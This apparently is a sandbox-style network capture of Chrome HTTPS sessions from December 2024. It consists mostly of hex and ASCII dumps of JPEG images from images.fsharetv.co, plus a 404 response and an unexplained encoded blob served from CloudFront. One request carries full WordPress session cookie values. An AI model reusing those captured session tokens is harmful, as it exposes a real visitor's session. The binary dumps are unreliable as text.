                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 8c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 57 04 42 26 bb cf dc 9f 41 8f 9e f8
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5WB&A
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: 84 a7 a0 d1 fb 3c f6 7c 25 d3 1e e2 f1 dc 00 1b 74 c2 77 73 d7 a8 b8 2c 45 e2 9b 72 a6 9f 33 f8 aa cc 91 dc 9c b6 5d 0d 5c 2a 19 ee e5 cd 65 bc d6 d8 de 99 13 a6 17 26 36 3d 23 1d b0 e8 bf 4f a9 96 b8 45 47 7d c2 76 ce 41 fc 1e 9d 39 b4 36 ad dc 3d d8 3e 91 6d c9 ef 5b e1 b1 bb 9a d6 24 27 dc 61 b7 9e da ef 39 cf a3 e6 67 a5 4d 5e 9e 50 0e 28 6d d7 09 dd 8f 5f 91 44 a2 2f 75 0b 7d 40 f9 c5 63 af 5a b3 eb 64 ce 5d 9d 35 84 8f 9e 8e d7 96 34 8e 98 db 27 f1 3a 09 72 e9 97 d7 f2 79 be 1f 4f 58 88 87 57 97 a5 bf 9e 36 4c d3 bf cd af 7a 6f ce 1b e4 53 63 95 a7 59 bc de 96 39 9d a7 36 be 98 b4 06 93 41 f6 bc 8d da 77 cf 7a 96 1a db ea 8c f2 a4 46 28 4e ec e5 59 19 69 4a 6d 56 dd f1 2d c2 d8 fa f5 25 d2 45 da a5 6c aa 1f 33 54 13 4c cc cb 54 57 a6 f3 f0 eb b6 44
                                                                                                                                                                                          Data Ascii: <|%tws,Er3]\*e&6=#OEG}vA96=>m[$'a9gM^P(m_D/u}@cZd]54':ryOXW6LzoScY96AwzF(NYiJmV-%El3TLTWD
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: 8f 28 2e 41 38 a1 aa 01 72 d9 cd 3d f6 57 5d ee 5d 02 6b e7 a8 70 02 7a 3d 1c 22 75 33 72 b8 33 f1 c3 1c a1 f3 c3 bd de b6 4e ea c7 19 cb 6a 64 dd d3 be c6 ae 52 0b 54 b3 be 63 79 3d a2 b0 0e a1 dc 18 bf 4b 3a 3a 6c 68 4f 76 c6 36 c9 bb 5c 72 a2 73 22 76 5e cb 31 d8 3b 9e 41 7a b3 17 a3 73 72 11 37 f7 59 a8 0b 02 fb dd c1 8b 74 b3 a9 0f e9 00 b9 04 4a 8d a8 0d 85 7c 53 df 7e 10 2e 6c 2a a8 a5 a4 20 4a c6 19 1c d6 b7 c0 2a d5 66 1f 2d 1e 5d ef bb 11 fd 2c 0f ef 3c 18 bf 4b 3a 26 e5 34 29 0f e9 34 5d 34 6d 6f f5 49 27 14 5f 36 2e d5 7c e1 54 5f 7c 0a ba 8e 69 df 78 f1 88 a5 85 ec 64 9e eb 4d 8d d6 09 f7 9e 0c 63 a4 9d 35 0f 48 be c6 36 c8 6c 1a a9 64 5c f8 a3 d1 cd 58 9c 14 d5 ee 69 33 d2 41 47 35 29 8f 11 a5 a4 ae 90 3d d8 95 14 14 c1 9b 9f 7b 01 37 97 83
                                                                                                                                                                                          Data Ascii: (.A8r=W]]kpz="u3r3NjdRTcy=K::lhOv6\rs"v^1;Azsr7YtJ|S~.l* J*f-],<K:&4)4]4moI'_6.|T_|ixdMc5H6ld\Xi3AG5)={7
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: fa 82 ee 44 d9 08 ed ce 79 1b 17 37 b8 bf 53 ec f6 7f a8 3c 18 87 4d 50 ad b2 dc 4c 88 b9 06 06 72 73 83 75 3e ba 83 94 41 44 c8 85 df 25 7b 9f e8 a7 66 17 33 fe 4c c2 a2 66 b2 07 c5 0f d5 25 49 7f 3d ef f0 b9 c5 1b 04 ea a2 c6 0b 48 4d b2 92 d2 df 62 ca cb b3 dd 41 e0 c4 3a 6a 8e 30 2e 99 18 08 29 2a 32 e8 d8 28 9f 31 cc f8 e3 6c 63 2b 5e d6 ff 00 ec ef 21 a3 47 56 1f d1 94 94 4d f9 ef 5a 11 9f f9 0f ab 53 35 0d c6 66 d8 e4 b1 cf 77 35 39 99 80 44 64 36 47 d8 ec f7 50 ee 0a fe 9a a3 88 47 fd 09 a1 06 34 f3 61 63 3e 2e a9 b2 35 24 ac e7 f4 5e 07 33 38 fd 09 5c e3 64 ed 10 08 42 54 6e 31 1c ca 8e 66 3b 91 88 5b 47 45 95 f9 9b 3d bf 52 43 bc 7d 8b bd 3a 3b 8f b3 dd 43 b8 2b fa 7a 8e 06 b0 b9 06 65 e5 95 06 ac e0 2d e1 45 df e5 be 68 46 73 fa 7d ed ab 18 5e
                                                                                                                                                                                          Data Ascii: Dy7S<MPLrsu>AD%{f3Lf%I=HMbA:j0.)*2(1lc+^!GVMZS5fw59Dd6GPG4ac>.5$^38\dBTn1f;[GE=RC}:;C+ze-EhFs}^
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: 54 bc bd 54 bc bb 54 bc bb 54 bc bd 54 bc bb 54 bc bb 54 bc b9 54 bc b9 52 bc bb 52 bc bb 50 bc bb 50 a4 c0 27 8d ae 72 a1 a1 7d 71 22 3a 68 4d 44 8c 8c 49 85 49 44 dc ef 2d d1 13 a2 aa c1 e4 a4 8f 7a ea 3a 43 5b 26 ed b8 3e b5 50 ab 6a 4f 06 50 ad 6f 6f 3c aa 56 c8 ec 96 74 32 23 4e e7 5e c2 23 ea 6a 31 3a 43 16 f1 94 e7 91 14 c4 11 78 a9 b2 b5 80 d3 83 1f a4 e7 69 db 8c bb 2d 24 d6 ec c9 fb d4 0c c9 88 e5 18 e0 ff 00 4a e4 4a dc dd d1 b4 e3 6c cf 4d 32 ec e7 52 56 19 ad 73 6d ef 4d 0b 1c e3 71 a3 9a 9b 13 23 cb 99 8d 8e 2b 39 6e 83 6c 13 63 60 4c 0c 8f 55 bb de ac 91 a6 86 c2 ec cb 23 1b 62 b2 b5 b6 bb 5a c3 e9 50 06 6b 91 63 ce 02 96 c7 b3 5c ea 15 53 7b b6 24 c7 2a ea 7e f1 19 88 c7 84 32 00 e7 bb 0e a4 6c 4f 94 ac 55 86 4a 59 83 70 77 ee 5d 3c cb 00
                                                                                                                                                                                          Data Ascii: TTTTTTTTRRPP'r}q":hMDIID-z:C[&>PjOPoo<Vt2#N^#j1:Cxi-$JJlM2RVsmMq#+9nlc`LU#bZPkc\S{$*~2lOUJYpw]<
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: ea 20 9d 98 fc 71 4b aa c2 54 34 3d d4 2b b3 0b 4a 6c 6c 09 3a d9 d8 28 08 b7 9d 40 42 86 14 27 27 3e 48 a7 d0 b2 2f 64 19 75 14 f6 da 8a 47 49 10 85 2a e6 ff 00 61 69 e4 2e 49 3e 68 88 12 a1 30 c7 92 64 69 ef 84 48 64 79 e6 79 1b 5b f9 4c 4c 06 5a a2 19 95 05 49 32 22 92 5a 46 ba 94 bc 92 4f ad cb 51 92 b7 a8 4d 5b e2 b7 45 06 f8 a5 ac 92 7e 31 f4 52 4f de 59 60 b6 05 22 69 0b 1c b5 45 fb 12 ae 25 32 c9 a0 5d dc 88 23 10 2e ed 6a cd 6a a5 f7 59 c5 6b ad da dd a5 2e df 8a c4 07 ec 5b 98 e3 fc 21 ea 72 b4 8a 0d d7 5a 27 29 16 f1 a1 26 7b 03 c8 a8 80 48 cc cf 2c cf 34 8d 2b 08 58 d2 45 a6 8d b9 cf 02 32 33 4d 1b 13 90 2d e4 3e 85 83 8f d8 23 8d 7d 17 27 b2 da 9d 3a e4 69 40 1a 50 c7 93 92 50 1a da 03 b2 8c b0 15 7f 20 8c 2d ba fc 02 92 70 02 22 72 e6 e5 bd
                                                                                                                                                                                          Data Ascii: qKT4=+Jll:(@B''>H/duGI*ai.I>h0diHdyy[LLZI2"ZFOQM[E~1ROY`"iE%2]#.jjYk.[!rZ')&{H,4+XE23M->#}':i@PP -p"r
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: 00 2b 98 f5 4c 88 ed 01 60 ea b8 82 84 61 5c e0 86 7d 28 41 0c f7 42 d5 d2 30 b6 53 41 be 25 08 be a9 aa 3e 24 24 6d 13 1a 2d 43 e5 91 70 e6 34 05 14 7e b6 73 4f 2d 05 9e 65 74 84 39 d0 3b d3 e8 3a 03 3b 7a fb 45 21 2c de d4 60 f2 5d 03 52 c2 d2 6c 3f 55 4a 41 c2 5d e5 6b b0 3f 7d 1f da 64 bf 27 9a ff 00 c9 7d ab ee a4 33 63 c6 b0 b0 df 7d d1 9d d3 aa b2 b0 94 21 18 cc 88 ee 46 9b 89 19 fd 93 f6 d1 75 67 98 c8 b8 73 0a dd 0e bb 79 ac 3b 5b 01 b0 ed bc 23 10 21 13 5d 53 e2 66 b0 ad 65 56 8b 0f 6a fb 48 24 03 29 4f 8a 78 0e ce 94 67 62 c2 40 4b a4 e4 f6 81 7c 65 5d 88 e6 61 1c 67 60 3e e9 e0 b4 50 8b a3 24 e0 5a 3e ef 3a c5 f6 80 25 61 0b 09 4e 73 b6 10 82 70 74 03 aa 4f 14 db 47 36 d9 4b 45 d5 9e 63 22 e1 cc 69 82 69 dc 81 dc 98 7c 25 34 81 d8 98 ef 09 4d
                                                                                                                                                                                          Data Ascii: +L`a\}(AB0SA%>$$m-Cp4~sO-et9;:;zE!,`]Rl?UJA]k?}d'}3c}!Fugsy;[#!]SfeVjH$)Oxgb@K|e]ag`>P$Z>:%aNsptOG6KEc"ii|%4M
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: ad c2 9e 6b 7e aa fb 08 84 27 08 ac 23 b3 46 0e b6 b3 fa ad 10 ac c0 c9 a1 61 23 06 b4 c6 8c 3a 6e 0c 44 93 12 00 8e 0e 66 00 df 3a ec 47 ea c1 01 2d 7a 40 f1 6c 91 75 2a 4f 13 84 33 24 7d b2 0d f5 d5 56 d9 2a 9a 4c ed 71 35 92 ac 3f f5 10 08 a9 b7 8d bb 7f e6 43 a2 44 15 ca aa 1c ce 3d 47 f2 d2 9f e6 74 bf 35 a9 f9 d0 af 8f 39 a3 53 60 05 97 8f 09 98 4f aa 1d b2 9d 75 d7 34 e9 7a 55 1b 4c 11 d5 fd 92 6e e4 f3 5c 7b eb e6 8c 28 98 8d 85 3c 81 ea 8c 84 61 b2 35 e4 3c 52 8f 42 11 8f 96 44 e1 e7 93 58 6b 47 af 1c 7a af e4 7f 1b b9 59 5d 99 16 bc 2b 30 ae 9c 63 23 07 0e 78 ee 3c 93 47 88 26 8f 12 68 f1 26 8f 12 68 f1 26 8f 12 68 f1 20 3c 48 0f 12 0d f1 20 df 12 0d f1 2a 3e 25 47 c4 a8 f8 bd 95 1f 17 b2 a3 e2 f6 54 7c 5e ca 8f 8b d9 50 f1 7b 2a 1e 2f 64 59 e2
                                                                                                                                                                                          Data Ascii: k~'#Fa#:nDf:G-z@lu*O3$}V*Lq5?CD=Gt59S`Ou4zULn\{(<a5<RBDXkGzY]+0c#x<G&h&h&h <H *>%GT|^P{*/dY
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: a1 45 54 d4 63 6a 6e ee 36 a0 1d 96 dd 8d 6b 53 50 c7 78 32 c5 1e 8d 31 32 5b ee ff 00 d5 76 58 fa 96 6a d2 f0 46 b4 b9 96 65 97 c5 b8 aa 69 ce bf 69 72 69 f4 39 6a 28 1e 78 25 92 a5 ac 2d 5a e8 b0 c2 b0 03 4c aa 27 cc ff 00 33 07 f6 41 6d da 77 f0 3f e9 99 e5 f8 9f 0f cf d2 41 64 cd 39 9e 17 ea 51 82 69 88 b5 39 3c a5 cd 43 99 7e 0f 83 af 83 93 c1 ef 99 e3 2d b8 08 dd cb 6b b8 ed e5 15 9e 81 3b 9a 4d 5e 25 ff 00 d6 9b 84 f8 ee 7c 55 e1 88 5c af 40 7f 90 cb 28 c3 51 60 bf 69 46 0f 03 f4 ab 0f c9 95 8f ba 1e ed 70 04 94 3c 1a ab 4b 57 7e d3 4b 32 84 d1 5f ba 26 9d b4 0a c2 ab 53 ff 00 7c 9f cc 43 ea cc 53 e6 df c4 dc 82 fc 0b b5 10 45 11 86 08 b9 f8 81 ca e0 f0 8a d5 38 1d fb 3a 3e 52 f3 87 95 77 eb 69 59 c7 95 f5 e9 68 1e f2 a5 ed 35 d5 b9 82 8e ab 1f 41
                                                                                                                                                                                          Data Ascii: ETcjn6kSPx212[vXjFeiiri9j(x%-ZL'3Amw?Ad9Qi9<C~-k;M^%|U\@(Q`iFp<KW~K2_&S|CSE8:>RwiYh5A
                                                                                                                                                                                          2024-12-15 11:38:04 UTC1378INData Raw: 77 60 a0 e6 97 37 67 ac 01 5a 86 ce 7e d0 7a b0 63 46 9c 7f 1e d9 8a 4e 11 ec d7 47 a4 aa a3 e3 d7 2f 57 fb 39 eb cc be 75 98 ec 3e ef 3f d4 36 45 78 f9 74 fd ce bf f3 c8 61 da 3b e8 7f cd 8c 20 e4 e5 eb b7 63 f7 2d 60 55 f3 5d b4 0f 68 47 9c f6 bb f3 e8 cd 41 0d f4 41 f8 1c 07 3d f7 fc 4d 16 77 36 fa 17 f8 9c d8 72 fb 1f 8e 0a 9d d7 0f 9b cd 58 99 9f c8 bf 99 65 a7 ce ef c1 15 7c cc a4 b5 44 4c 4c 70 e7 bf fc ba 5f d0 de ca 69 f4 1f 49 9c 1f b9 73 b3 a7 cf b1 0a 31 a0 df 4a fd 7d e7 bb 47 07 ef ed 04 b6 f6 fc 86 63 c6 03 e9 3e ea be b9 85 8b 26 ea 2d f2 d2 08 9c 6e de 71 c3 cb 42 75 35 02 a1 8e 07 a8 e7 ce 8e f1 af e8 fe a1 ac b9 79 ca ce f9 f6 9c c3 61 fc f1 14 f4 38 3f e5 f2 dc c3 e0 93 e5 78 8d 78 f0 51 2b c6 bc 32 3a 1c fe 89 a4 b5 df 7f 9d 20 be 89
                                                                                                                                                                                          Data Ascii: w`7gZ~zcFNG/W9u>?6Exta; c-`U]hGAA=Mw6rXe|DLLp_iIs1J}Gc>&-nqBu5ya8?xxQ+2:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          64192.168.2.1649796108.158.71.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:04 UTC695OUTGET /lMHl4TDlTFhYqBkQQHHEIAEBKfg4IXwg+XFZEHj9RUQsdOE8eGhdqU0MWFjwEdhEwOEAFSR5/CHg+IAgfRAMccRQFXxQtV1dEXilXU0RJalhUG0V4H0QJFycEWxsWKExTFQIgUhYMGXFUXwMRIFVRXEoKDB5JXX4JGA4RIl1fDgtpCwAXDGkLAEhIYgkVSj-ppCwAOESIPBFxLDhwCSQB6DRlcSnxYQAkUKU5VGxMlTRVLPnkKB1dLehwCSVAnUUQUFGkLc1xKfFVZEh1pCwAeHS9SX1BdfglTEQojVFVcSgoIAU5WfBcAV0hpCwAKGSpYQhBdfn8FSk9iCgZfDXEI HTTP/1.1
                                                                                                                                                                                          Host: d2w9cdu84xc4eq.cloudfront.net
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:05 UTC358INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 746
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:05 GMT
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          Cache-Control: max-age=31556926
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 7fe845e495399d62eea17599202da57e.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                          X-Amz-Cf-Id: mJCswnXfsJmyyVj-nryCbVzB7uiF8BXL1mbxVmWLPSKLeP1zGllgtA==
                                                                                                                                                                                          2024-12-15 11:38:05 UTC746INData Raw: 46 68 48 74 79 35 30 66 33 31 48 47 58 44 28 22 65 48 55 34 70 69 45 47 72 64 61 45 72 63 45 46 72 64 55 47 72 54 43 35 76 63 74 4e 68 66 6d 47 44 65 34 52 41 79 30 4a 44 66 6d 4c 76 4d 56 4b 68 4d 31 53 76 64 77 37 76 64 72 49 72 63 45 34 72 64 61 49 73 4d 74 50 42 4d 6c 38 41 37 6d 36 41 66 6d 4f 42 65 6b 4b 67 37 30 4a 73 53 45 45 76 78 4a 44 76 64 77 49 65 47 73 4b 68 7a 74 39 43 47 73 49 73 53 34 55 43 4e 6d 48 73 63 4f 53 76 63 73 4b 41 4d 50 4d 57 66 6c 49 43 47 73 49 73 53 34 51 41 4d 68 34 44 65 46 48 73 63 4f 53 66 69 46 42 66 69 46 4d 67 65 46 48 68 69 46 4d 67 65 46 48 68 69 46 32 58 69 45 45 76 63 73 53 76 63 74 4e 68 66 6d 47 44 65 34 52 41 79 30 4a 44 66 6d 4c 76 4d 56 4b 68 4d 31 53 76 63 73 53 76 78 4a 44 76 79 68 5a 42 7a 71 56 76 64 61
                                                                                                                                                                                          Data Ascii: FhHty50f31HGXD("eHU4piEGrdaErcEFrdUGrTC5vctNhfmGDe4RAy0JDfmLvMVKhM1Svdw7vdrIrcE4rdaIsMtPBMl8A7m6AfmOBekKg70JsSEEvxJDvdwIeGsKhzt9CGsIsS4UCNmHscOSvcsKAMPMWflICGsIsS4QAMh4DeFHscOSfiFBfiFMgeFHhiFMgeFHhiF2XiEEvcsSvctNhfmGDe4RAy0JDfmLvMVKhM1SvcsSvxJDvyhZBzqVvda


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          65192.168.2.1649797104.21.10.1584436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:04 UTC961OUTGET /N/A HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:38:05 UTC783INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:05 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Content-Length: 5
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2BfTEyXCZr2lOhfmsOa81sbl01xyWqPm8jMCnozW8rp8mR1Ziu3SpaLYBIwaI1U1ffkcFEYNBbZE1s5DZV2DNH4WAB7A6cAGI8hgDKuWnjUc4ut8Uw33%2F3ecXi7oXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f262536cec9236a-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1787&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1561&delivery_rate=1599123&cwnd=170&unsent_bytes=0&cid=1879b8b0e155e485&ts=764&x=0"
                                                                                                                                                                                          2024-12-15 11:38:05 UTC5INData Raw: 45 72 72 6f 72
                                                                                                                                                                                          Data Ascii: Error


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          66192.168.2.1649798172.67.131.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:05 UTC356OUTGET /jwjzcdhlaa.jpg HTTP/1.1
                                                                                                                                                                                          Host: images.fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:05 UTC1047INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:05 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 35043
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          etag: "2a534114cd20518c30d23e71999d5ad6"
                                                                                                                                                                                          last-modified: Mon, 25 Sep 2023 08:22:29 GMT
                                                                                                                                                                                          x-amz-id-2: txga4645cf608434b96b4ac-006759b082
                                                                                                                                                                                          x-amz-request-id: txga4645cf608434b96b4ac-006759b082
                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                          Age: 331546
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2lmG3QGmg9qCnqvlYCchEkNGQtkmbxKiGEDFsrA2jRkJyu4cvDSsn%2BV%2F%2Be0vsC0Js75PXeHVWjEVOQYpqWsgxwDuU0jK%2FZk57kc%2FXzxRH1Atqw0vj%2B8xLF%2BNo%2FVhBMVnWFARpp8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f262537ccc10f74-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1719&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=934&delivery_rate=1698662&cwnd=151&unsent_bytes=0&cid=5c7c6265840ede11&ts=459&x=0"
                                                                                                                                                                                          2024-12-15 11:38:05 UTC322INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 05 06 06 05 08 08 07 08 08 0b 0a 09 09 0a 0b 11 0c 0d 0c 0d 0c 11 1a 10 13 10 10 13 10 1a 17 1b 16 15 16 1b 17 29 20 1c 1c 20 29 2f 27 25 27 2f 39 33 33 39 47 44 47 5d 5d 7d 01 05 05 05 05 05 05 05 06 06 05 08 08 07 08 08 0b 0a 09 09 0a 0b 11 0c 0d 0c 0d 0c 11 1a 10 13 10 10 13 10 1a 17 1b 16 15 16 1b 17 29 20 1c 1c 20 29 2f 27 25 27 2f 39 33 33 39 47 44 47 5d 5d 7d ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 01 02 08 00 09 ff da 00 08 01 01 00 00 00 00 e5 ec e7 6d 55 f4 9c 66 99 d5 2d 71 af bd b7 b5 d7 de c6 be db 0a 29 ae 8a 68 ee 4b 48 6c e3 da 63 1b 63 db 6b 9d 7d 8f 7b
                                                                                                                                                                                          Data Ascii: JFIF) )/'%'/9339GDG]]}) )/'%'/9339GDG]]},"mUf-q)hKHlcck}{
                                                                                                                                                                                          2024-12-15 11:38:05 UTC1369INData Raw: 5e b4 72 40 c9 ab d6 ec 34 4b db 3c 71 ed 75 da cb e8 4e 48 68 d9 0d 9d 6b 14 dd 5b 7a 0c 17 2a 33 46 41 93 89 db 37 a5 9a 81 d3 55 5e e5 41 59 ce b9 92 57 a9 2e be 12 19 e9 88 ea ca b2 96 90 6b 73 f5 57 34 47 57 c3 10 39 74 ce 5b aa 2e ce 71 a4 bb 3e 73 84 fa 26 dc e0 a2 5e a5 e7 8e a3 a1 28 99 8e f4 e6 d6 b6 25 cd ca 67 c0 1d 66 21 92 ee 53 ea aa a2 7e 32 80 a8 66 3b 6c ca 17 e7 ca c9 4a 9c f5 80 50 9d b9 5c 1f 0d 54 61 a1 7d a8 ee 14 f0 02 7c 51 85 df cb 16 1d d5 c5 5d ab c2 22 9d 29 7d 70 15 e7 d1 fe 1b e0 9c 61 5e 97 33 a4 fa 82 53 95 3a c2 bd a8 1b c2 d8 5d 09 95 29 d9 20 fb 32 5f 8e 40 7e 8e f0 8f 78 7c f7 8c ea ab af 80 58 74 05 ca 4f 41 f3 6d d4 5c 17 7f f3 c9 55 d0 31 ed 2a 2d bd 27 7c 36 9e a6 c9 82 ae 68 ee 28 18 fa 33 c1 7d e9 c2 76 67 54 f2
                                                                                                                                                                                          Data Ascii: ^r@4K<quNHhk[z*3FA7U^AYW.ksW4GW9t[.q>s&^(%gf!S~2f;lJP\Ta}|Q]")}pa^3S:]) 2_@~x|XtOAm\U1*-'|6h(3}vgT
                                                                                                                                                                                          2024-12-15 11:38:05 UTC1369INData Raw: 31 c0 71 a4 4f b5 12 4b 2a c9 b3 c4 77 b2 a1 c5 a9 5b c2 47 e2 5b a2 ea 7a ff 00 57 b2 77 69 b8 18 eb fb a4 ad ff 00 18 53 ba 90 48 6a 2e 82 4e a4 e3 d6 8b f6 ce 0c ec ea 8d 9b 55 2c 3b 94 7e 8f 55 17 c6 66 f1 41 c5 e7 f6 9c 4f 15 0c 4c 37 94 c0 eb 24 d7 7e 93 e8 d5 70 f8 9c be a7 43 3e e8 12 86 54 a0 ff 00 a4 e5 2e 41 66 56 6c c5 92 0b ca 1d 37 6a f3 75 36 d2 26 2f 5d dc 94 48 6c 6a 3d 1e f3 4a f9 2c 11 74 12 ed 82 e9 b5 a7 a5 3a 38 8a 5d fc a4 1c 2d 13 d0 44 d3 1c 63 5a f4 47 27 b3 dd 6b 3e 51 5b 36 18 b2 97 c0 2c 0e 2d a3 f7 8a 46 94 d7 54 f9 0d c7 6e 91 32 79 5c 9e 51 77 9c 6b ee 33 81 b7 b9 d1 05 77 bc 56 c9 f3 e9 de 69 1e 98 e8 28 19 08 a7 c2 82 d6 21 47 29 c4 5c 96 8d a1 33 5a c8 1b 55 31 04 55 65 49 84 47 f4 df 37 f2 5b cd df 2e b9 da 91 b1 7b a9
